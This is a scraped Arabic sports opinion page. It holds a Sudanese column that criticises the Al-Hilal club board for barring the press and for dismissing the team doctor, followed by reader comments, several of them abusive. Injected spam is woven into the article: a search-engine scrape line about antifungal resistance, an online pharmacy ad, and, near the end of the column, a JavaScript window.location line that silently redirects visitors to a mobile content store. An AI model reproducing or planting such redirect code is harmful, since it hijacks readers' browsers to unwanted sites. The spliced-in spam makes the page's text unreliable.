الرئيسية / مقالات / الي ان نلتقي قسم خالد بعنوان علي كيفي …!!

الي ان نلتقي قسم خالد بعنوان علي كيفي …!!

bing.com-[en-us];antifungal medication;http://www.cdc.gov;http://www.cdc.gov/fungal/antifungal-resistance.html;antifungal resistance | fungal diseases | cdc;although most antifungal resistance occurs in candida species, resistance in other types of fungi, such as aspergillus, is also an emerging issue.

على كـيفي

قسم خالد

أرقع جبتي أولا أرقعها

أطرزها من الالوب .. ألبسها على المقلوب.

أخلعها .. على كـيفي .

أنا لم أنتخب أحدا

وما بايعت بعد محمد رجلا

ولا صفقت للزيـــف

لماذا أعلنوا صوري؟

لماذا صادروا سيفي..؟

أنا ما قلت شيئا بعد حتى الآن

حتى الآن أسلك أضعف الايمان

أنا في هذه الدنيا على كيفي ..

إلى أن تكمل الأشراط دورتها .

بمهدي حقيقي لينقذنا من الدجال والتمثال .

والإشراك والحيـف

سأبقى ما حييت أنا على كــــــيفي

إلى أن تطهر الدنيا وينزل سيدي عـــيسى

لأن طريقتي في الحب يا وطني

على كـيفي!

لا ادري لماذا جالت بخاطري هذه القصيدة للشاعر الكبير عبدالقادر الكتيابي وانا اهم بكتابة هذا العمود .. ربما لانني لم (انتخب) احدا كما قال الكتيابي وبالتالي (علي كيفي) انتقد من اشاء من اعضاء مجلس الهلال .. لا يهمني ان رضوا عني ام لم يرضو لان الهلال هو همي .. سابقى علي كيفي حتي (تطهر) ارض الهلال من اي مجلس تابع يحرك عن طريق (الريموت كونترول) لا يشرفنا بالطبع ان يكون الهلال كما صار الان .. نعلم جيدا ان كتاباتنا تغضب البعض وهذا دليل علي اننا في الطريق الصحيح .. طريق تحرير الهلال حتي يعود الهلال الي القه ونضاراته .. نعم يبدو الطريق وعرا .. نعم ربما طالت فترة التطهير لكنه في النهاية سيحدث وسيعود الهلال ساحة للحب والوئام بعد ان تم تحويله ساحة حرب( ومطاردة )… مطاردة الصحف لا لجرم ارتكبته  او لفاحشة في حق الهلال احدثتها .. تمت مطاردة الصحف لانها قامت بالتصوير .. !

وفي عهد هولاء صار الهلال (منطقة عسكرية) يمنع منها (الاقتراب والتصوير) .. تميز الهلال في تلك الشعبية التي تلتف حوله … تميز الهلال في التفاف جماهيره حوله .. وعندما تلتقط الصحف الصور وتتباري في اظهار محاسن الهلال ياتي هذا من اجل تلك الجماهير التي تنتظر من الهلال الكثير !

هولاء يرغبون في تحويل الهلال من (الشعبية ) التي تميزه دون غيره من الاندية والدليل علي ذلك الجماهيرية والاكثرية عنده دون غيره .. هولاء للاسف يرغبون ان يتحول الهلال من ناد للديمقراطية .. الي ناد (للبرجوازية) يشهد تدريباته (ابناء الرئيس) ويمنع فيها اهل الصحافة !

لو سألتهم لما سمح لابناء الرئيس بمشاهدة التدريبات وحرمت الصحافة؟؟ لن يجيب عليك احد .. ولو سألتهم من هو الاحق بحضور التدريبات هل هم اهل الصحافة ام اسرة الرئيس .. وبالطبع لن تجد اجابة من احد !

نقر ونبصم بالعشرة ان للمجلس الحق في تنظيم اموره .. ومن تلك الامور العلاقة بينه والصحافة .. فهل العلاقة بين المجلس والصحافة الهلالية علي مايرام؟؟ .. الاجابة العلاقة ليست علي مايرام .. علاقة المجلس المباشرة بالاعلام الذي يمجدهم ويوهمهم انه يدافع عنهم .. وما دروا ان تلك الاقلام تدافع عن مصالحها في المقام الاول ثم مصالحهم ومصالحهم وربما لا يات الهلال ابدا في جدول الدفاع !

كيف لا تتوتر العلاقة بين المجلس والاعلام الهلالي وبعض هولاء يعتقد ان الكرسي الذي يجلس عليه لن يغادره ابدا او هكذا قالو لهم .. والدليل علي ذلك يخرج علينا رئيس المجلس جازما بان سيظل رئيسا للهلال لمدة (25) عاما بحسبة بسيطة اراد السيد الرئيس ان يقول انه سيظل رئيسا للهلال لثمان دورات واذا قلنا ان دورة المجلس لا تتعدي السنوات الثلاثة (8×3) بتساوي (24) عاما وليست (25) عما كما قال وبالتالي موضوع ال(25) سنة التي صرح بها السيد الرئيس ما هي الا ضربا من (الفشخرة) او استعرض القوة بلا منطق !

يبقي الكاردينال رئيسا بامر جماهير الهلال واعضاء الجمعية العمومية وليست برغبته الشخصية ..  ما اسهل ان تتحدث .. ولكن ما اصعب ان تفعل وتنفذ  !

online pharmacy london uk buy strattera online – visa, mastercard …

كل المناصرين لمجلس الكاردينال لديهم مقولة (امنحو المجلس الفرصة) ليقدم كتابه وبعدها حاكموه علي فعله .. ونحن نقول لهولاء وماذا لو وجدنا الهلال بعد ان يغادر هذا المجلس عبارة اشلاء متناثرة .. انهتك نسيجه الاجتماعي وصارت جماهيره منقسمة ويفقد الهلال بالتالي سر تميزه علي الاخرين ؟؟ ماذا لو حدث هذا وماذا سيقول هاؤلئك ؟؟؟

اخيرا اخيرا !

الهلال عندنا (خط احمر) تلك مقولة نعمل جاهدين لتطبيقها قولا وفعلا .. والهلال الذي اعنيه هو فريق كرة القدم .. ولهولاء اسألهم هل هناك ناقدا او معارضا لمجلس الكاردينال شكك يوما في ولاء لاعب ؟؟؟ وهل اتهم يوما لاعبا بالانتماء لفريق اخر ؟؟ وهل شنت الاقلام الناقدة لمجلس الكاردينال يوما هجوما علي اي من نجوم الهلال ؟؟

وهل اتهمت الاقلام الناقدة يوما لاعبا بالهلال بانه (باع) مباراة ؟؟ الاجابة كل الاقلام الناقدة لمجلس الكاردينال تعتبر اللاعبين (خط احمر) لذا توفر لهم الحماية من الذين يشككون في انتمائهم .. يشكلون حماية لهم من اقلام اتهمتهم في زممهم .. يشكلون حماية لهم مما يتعرضون له من سياسة التخويف والارهاب التي يمارسونها عليهم صباح مساء .. وستظل تلك الاقلام الناقدة (تحرس) نجومها لانها تعلم جيدا ان نجوم الهلال هم الثروة التي يجب ان نعض عليها بالنواجذ لا التشكيك في ولائهم لهذا الكيان الكبير !

اخيرا جدا ..!

اقيل الدكتور  عباس عبدالكريم لان السيد باتريك لا يرغب في وجوده .. اقيل الدكتور عباس من رئاسة الوحدة الطبيبة بنادي الهلال لان السيد باترك يرغب في تعين اطار طبي من اوربا كما يقولون .. باتريك يرغب في طبيب يقول له ان الشمس تشرق من المغرب فيقول له الطبيب كلامك صاااااااااح … يرغب باتريك في طبيب لا يوقفه عند حده اذا (كورك في اللاعبين بطريقة غير محترمه) او اذا قال له ان اللاعب الفلاني (دا متمرد)  الجابو شنو من الخرطوم !

عزيزي الطبيب الانسان عباس نعلم تماما ان باتريك غير مؤهل لتقييمك لانه لا يدرك عن الطب شئيا .. ونعلم انك ستتعرض في مقبل الايام لهجوم كبير من الالة الاعلامية للكاردينال رغم اطنان الاشادات التي حظيت بيها ابان فترة الكشف الطبي قبل التسجيلات !

اروع ما في السجود انك تهمس فيسمعك من في السماء !

سبحانك اللهم وبحمدك !

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

التعليق بواسطة فيس بوك

8 تعليقات

  1. القصيدة الشاعر عبدالقادر الكتيابي لا تتطابق مع وضعك الحالي ياقسم خالف تعرف!! الكتيابي يقول على كيفي وأنت ليس على كيفك بل علي كيف الكفيل !! والكتيابي يقول ومابايعت بعد محمد رجلا وأنت بايعت الكفيل على مهاجمة المجلس الشرعي !! نتجاوز القصيدة ونتحدث بصراحة ياقسم هل يختلف التشكيك في المجلس قبل أن يباشر أعماله وفي الأجهزة الفنية قبل بداية التنافس ونتائج المباريات عن التشكيك في ولاء اللاعبين ومستوياتهم؟! الكاردينال شاهد أولاده تمرين الفريق زعلت !!هل غضبت عندما كان الكفيل يتصرف في الهلال كالضيعة الخاصة يسجل ود أخوه (هل تم تسجيله عن طريق لجنة فنية؟!) وكان يصطحب المغنواتية والشعراء في طائرة واحدة مع فريق الكرة ويقيمون مع اللاعبين في الفنادق ويشاهدون التدريبات ومع دلك يطالب الهارب بديونه على الهلال يعني الهلال يدفع للهارب مبالغ صرفها على رفاق الهشك بشك !! ياقسم هل الدنيا ستقيف لواقيل الطبيب عباس (رغم جهوده الكبيرة في خدمة الفريق) ؟ الدكتور والمدرب كلهم يهمهم نجاح الفريق ولكن أنتم يهمكم تشتيت الجهود والثورة على المجلس ولو من باب فشل الفريق!!

  2. قصيدة الشاعر عبدالقادر الكتيابي لا تتطابق مع وضعك الحالي ياقسم خالف تعرف!! الكتيابي يقول على كيفي وأنت ليس على كيفك بل علي كيف الكفيل !! والكتيابي يقول ومابايعت بعد محمد رجلا وأنت بايعت الكفيل على مهاجمة المجلس الشرعي !! نتجاوز القصيدة ونتحدث بصراحة ياقسم هل يختلف التشكيك في المجلس قبل أن يباشر أعماله وفي الأجهزة الفنية قبل بداية التنافس ونتائج المباريات عن التشكيك في ولاء اللاعبين ومستوياتهم؟! الكاردينال شاهد أولاده تمرين الفريق زعلت !!هل غضبت عندما كان الكفيل يتصرف في الهلال كالضيعة الخاصة يسجل ود أخوه (هل تم تسجيله عن طريق لجنة فنية؟!) وكان يصطحب المغنواتية والشعراء في طائرة واحدة مع فريق الكرة ويقيمون مع اللاعبين في الفنادق ويشاهدون التدريبات ومع دلك يطالب الهارب بديونه على الهلال يعني الهلال يدفع للهارب مبالغ صرفها على رفاق الهشك بشك !! ياقسم هل الدنيا ستقيف لواقيل الطبيب عباس (رغم جهوده الكبيرة في خدمة الفريق) ؟ الدكتور والمدرب كلهم يهمهم نجاح الفريق ولكن أنتم يهمكم تشتيت الجهود والثورة على المجلس ولو من باب فشل الفريق!!

  3. استاذ قسم لماذا لا تقول للمجلس احسنتم قكل كلامك نقد ونقد غير بناء لذلك انت لا تكتب ماتراه انت خذلت الهلالاب وفعلا المعايش صعبه

  4. ياتري لو ماكنت موظف لدي صلاح هل كان سيكون هذا نهجك ياارزقي اتقي الله

  5. با قسم انت أتفه صحفي وانت راجل مدسوس على الهلال بالله عليكم انت وكفيلك اذهبوا فأنتم الطلاقا يا مأجور

  6. يا قسم من حق المدرب ان يحافظ على معسكره واللاعبين وخاصه فى فتره الأعداد الاولي فكل مدربين الفرق المحترمين بيعملوا كدا حتي فرق القاهره الاهلي الزمالك وكل الفرق الاوربيه يستحيل تدخل الصحافه فى بدايه الأعداد والمعسكر يدخله كل من هب ودبه يا قسم يا حقير
    ثانيا صلاح ادريس ودا قروش الهلال وين اصلا عشان يقول طالب الهلال قروش؟ هل لديه ما يثبت ذلك؟ هو غبي وانت اكثر غباء منه
    ثالثا كيف كان سوف يدير صلاح ادريس الهلال وهو متهم ومحظور فى جرائم بالسعوديه ؟ ماذا تريدون من الهلال
    ارحم نفسك انت وصلاح بتاعك داك وخليهو يشوف اولا حيتخارج كيف السعوديه وبعدها ابقي قابلني وأقول ليك اذهبوا فأنتم الطلاقاء

  7. اختشي يا قسم خالد والله كتاباتك بقت مقرفة . ياخي عيب عليك تأكل أولادك من مال السحت. بالجد نحنا دايرين قانون يوقف امثالك من الكتابة.والله صاح المعايش صعبة

  8. عرفتو خلاص يا اخوانا منو المدسوس علي الهلال ووين الزيف والغش والخداع والمتاجرة بادعاء الانتماء للهلال وهو وكفيله يتمنون من سويداء قلبيهما احتراق وخراب الهلال.

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*